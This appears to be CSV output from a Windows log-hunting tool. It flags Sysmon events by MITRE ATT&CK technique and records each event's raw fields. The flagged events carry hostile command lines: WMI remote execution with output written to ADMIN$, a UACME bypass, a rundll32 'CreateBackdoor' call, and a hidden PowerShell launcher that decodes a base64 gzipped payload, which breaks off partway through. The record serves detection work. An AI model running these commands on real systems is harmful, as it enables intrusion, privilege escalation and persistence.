"c:\windows\system32\cmd.exe" /c net user
c:\windows\system32\inetsrv\
IIS APPPOOL\DefaultAppPool
365ABB72-45C7-5CE7-0000-002092F99C00
0x9cf992
0
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-49D6-5CE7-0000-001020A7A700
2580
C:\Windows\System32\inetsrv\w3wp.exe
c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1556656371.324839,2019-05-01T00:32:51.324839+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1,"
1
5
4
1
0
0x8000000000000000
9827
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-30 20:32:51.246
365ABB72-B0F3-5CC8-0000-0010B1361D00
2504
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1
C:\
IEWIN7\IEUser
365ABB72-B0F2-5CC8-0000-00203D311D00
0x1d313d
0
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-B0C0-5CC8-0000-001017C31C00
836
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1556656371.324839,2019-05-01T00:32:51.324839+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1,"
1
5
4
1
0
0x8000000000000000
9827
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-30 20:32:51.246
365ABB72-B0F3-5CC8-0000-0010B1361D00
2504
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1
C:\
IEWIN7\IEUser
365ABB72-B0F2-5CC8-0000-00203D311D00
0x1d313d
0
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-B0C0-5CC8-0000-001017C31C00
836
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564911238.127145,2019-08-04T13:33:58.127145+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\windows\system32\cmd.exe "C:\Windows\system32\osk.exe" ),1,"
1
5
4
1
0
0x8000000000000000
5764
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-08-04 09:33:57.876
747F3D96-A685-5D46-0000-00100D41D703
3296
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
C:\windows\system32\cmd.exe "C:\Windows\system32\osk.exe"
C:\Users\IEUser\Desktop\
MSEDGEWIN10\IEUser
747F3D96-56A3-5D45-0000-0020FBD31800
0x18d3fb
1
Medium
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-A685-5D46-0000-00109B2AD703
3916
C:\Users\IEUser\Desktop\UACME.exe
UACME.exe 55 c:\Windows\SysWOW64\notepad.exe
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1618950781.944467,2021-04-21T00:33:01.944467+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 ) and IP ( 127.0.0.1 ) to hostname ( MSEDGEWIN10 ) , IP ( 127.0.0.1 ) and port ( 445 )",3,"
3
5
4
3
0
0x8000000000000000
578500
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
Suspicious NetCon
2021-04-20 20:33:59.834
747F3D96-04C3-607F-0000-0010F13B1E00
2532
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
MSEDGEWIN10\IEUser
tcp
true
false
127.0.0.1
MSEDGEWIN10
49925
false
127.0.0.1
MSEDGEWIN10
445
microsoft-ds
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556656371.246714,2019-05-01T00:32:51.246714+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1,"
1
5
4
1
0
0x8000000000000000
9826
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-30 20:32:51.168
365ABB72-B0F3-5CC8-0000-00105F321D00
3840
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1
C:\
IEWIN7\IEUser
365ABB72-B0F2-5CC8-0000-00203D311D00
0x1d313d
0
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-B0C0-5CC8-0000-001017C31C00
836
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1556656371.246714,2019-05-01T00:32:51.246714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1,"
1
5
4
1
0
0x8000000000000000
9826
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-30 20:32:51.168
365ABB72-B0F3-5CC8-0000-00105F321D00
3840
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1
C:\
IEWIN7\IEUser
365ABB72-B0F2-5CC8-0000-00203D311D00
0x1d313d
0
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-B0C0-5CC8-0000-001017C31C00
836
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1556656371.246714,2019-05-01T00:32:51.246714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1,"
1
5
4
1
0
0x8000000000000000
9826
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-30 20:32:51.168
365ABB72-B0F3-5CC8-0000-00105F321D00
3840
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1
C:\
IEWIN7\IEUser
365ABB72-B0F2-5CC8-0000-00203D311D00
0x1d313d
0
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-B0C0-5CC8-0000-001017C31C00
836
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028584.802196,2019-03-20T00:49:44.802196+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"
1
5
4
1
0
0x8000000000000000
1966408
Microsoft-Windows-Sysmon/Operational
PC01.example.corp
2019-03-19 20:49:44.712
365ABB72-55E8-5C91-0000-001037DF0700
4052
C:\Windows\System32\sdbinst.exe
6.0.7600.16385 (win7_rtm.090713-1255)
Application Compatibility Database Installer
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB "
C:\Windows\System32\
EXAMPLE\user01
365ABB72-5417-5C91-0000-002035340300
0x33435
1
High
MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F
365ABB72-551C-5C91-0000-001030590500
2704
C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe
"C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"
",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
Command run remotely Using WMI,1607599134.733908,2020-12-10T15:18:54.733908+04:00,,Threat,Critical,User (NT AUTHORITY\LOCAL SERVICE) run command through WMI with process (C:\Windows\System32\wbem\WmiPrvSE.exe) and commandline ( C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ),1,"
1
5
4
1
0
0x8000000000000000
549600
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-12-10 11:18:54.576
747F3D96-041E-5FD2-0000-001024DF3B00
5580
C:\Windows\System32\wbem\WmiPrvSE.exe
10.0.17763.1 (WinBuild.160101.0800)
WMI Provider Host
Microsoft® Windows® Operating System
Microsoft Corporation
Wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\
NT AUTHORITY\LOCAL SERVICE
747F3D96-7E79-5FD2-0000-0020E5030000
0x3e5
0
System
SHA1=67C25C8F28B5FA7F5BAA85BF1D2726AED48E9CF0,MD5=06C66FF5CCDC2D22344A3EB761A4D38A,SHA256=B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15,IMPHASH=CFECEDC01015A4FD1BAACAC9E592D88B
00000000-0000-0000-0000-000000000000
832
?
?
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1618950781.944115,2021-04-21T00:33:01.944115+04:00,,Threat,Low,Found User (MSEDGEWIN10\user03) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\System32\cmd.exe ),1,"
1
5
4
1
0
0x8000000000000000
578499
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2021-04-20 20:33:00.318
747F3D96-3A7C-607F-0000-001058067700
2740
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
C:\Windows\System32\cmd.exe
C:\Windows\system32\
MSEDGEWIN10\user03
747F3D96-3A7C-607F-0000-002075057700
0x770575
1
Medium
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-3A77-607F-0000-00105DD17600
7280
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1579034691.122589,2020-01-15T00:44:51.122589+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd.exe" /c notepad.exe ),1,"
1
5
4
1
0
0x8000000000000000
337
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-01-14 20:44:50.978
747F3D96-2842-5E1E-0000-0010745E7A00
1568
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
"cmd.exe" /c notepad.exe
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-2842-5E1E-0000-0020FF3A7A00
0x7a3aff
0
High
SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-2842-5E1E-0000-00100C417A00
4180
C:\Windows\System32\rundll32.exe
rundll32 url.dll,FileProtocolHandler ms-browser://
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556656513.168589,2019-05-01T00:35:13.168589+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 ),1,"
1
5
4
1
0
0x8000000000000000
9833
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-30 20:35:12.340
365ABB72-B180-5CC8-0000-00102BB71E00
1504
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\cmd.exe" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1
C:\windows\system32\
IEWIN7\IEUser
365ABB72-B17F-5CC8-0000-0020C6A31E00
0x1ea3c6
0
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-B17F-5CC8-0000-001082A51E00
3572
C:\Windows\System32\mmc.exe
C:\Windows\system32\mmc.exe -Embedding
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 url.dll,FileProtocolHandler ms-browser://)",1,"
1
5
4
1
0
0x8000000000000000
336
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-01-14 20:44:50.348
747F3D96-2842-5E1E-0000-00100C417A00
4180
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 url.dll,FileProtocolHandler ms-browser://
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-2842-5E1E-0000-0020FF3A7A00
0x7a3aff
0
High
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-2842-5E1E-0000-0010903C7A00
1628
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1,"
1
5
4
1
0
0x8000000000000000
336
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-01-14 20:44:50.348
747F3D96-2842-5E1E-0000-00100C417A00
4180
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 url.dll,FileProtocolHandler ms-browser://
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-2842-5E1E-0000-0020FF3A7A00
0x7a3aff
0
High
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-2842-5E1E-0000-0010903C7A00
1628
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1,"
1
5
4
1
0
0x8000000000000000
336
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-01-14 20:44:50.348
747F3D96-2842-5E1E-0000-00100C417A00
4180
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 url.dll,FileProtocolHandler ms-browser://
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-2842-5E1E-0000-0020FF3A7A00
0x7a3aff
0
High
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-2842-5E1E-0000-0010903C7A00
1628
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436040.330766,2019-07-30T01:34:00.330766+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh trace stop ),1,"
1
5
4
1
0
0x8000000000000000
4950
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:58.370
747F3D96-6646-5D3F-0000-0010913A8B00
6232
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c netsh trace stop
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.46327,2020-03-21T09:00:25.463270+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
1
5
4
1
0
0x8000000000000000
243558
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.452
747F3D96-9F69-5E75-0000-001035972000
1388
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1,"
1
5
4
1
0
0x8000000000000000
336
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-01-14 20:44:50.348
747F3D96-2842-5E1E-0000-00100C417A00
4180
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 url.dll,FileProtocolHandler ms-browser://
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-2842-5E1E-0000-0020FF3A7A00
0x7a3aff
0
High
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-2842-5E1E-0000-0010903C7A00
1628
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1,"
1
5
4
1
0
0x8000000000000000
336
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-01-14 20:44:50.348
747F3D96-2842-5E1E-0000-00100C417A00
4180
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 url.dll,FileProtocolHandler ms-browser://
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-2842-5E1E-0000-0020FF3A7A00
0x7a3aff
0
High
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-2842-5E1E-0000-0010903C7A00
1628
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.46327,2020-03-21T09:00:25.463270+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243558
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.452
747F3D96-9F69-5E75-0000-001035972000
1388
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1556656012.371714,2019-05-01T00:26:52.371714+04:00,,Threat,Critical,"Found User (NT AUTHORITY\SYSTEM) run Suspicious PowerShell commands that include ( -c ,[Convert]::FromBase64String,hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden , -c ,[Convert]::FromBase64String,hidden,Hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden ,WindowStyle) in event with Command Line ("powershell.exe" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))) and Parent Image :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , Parent CommandLine (powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd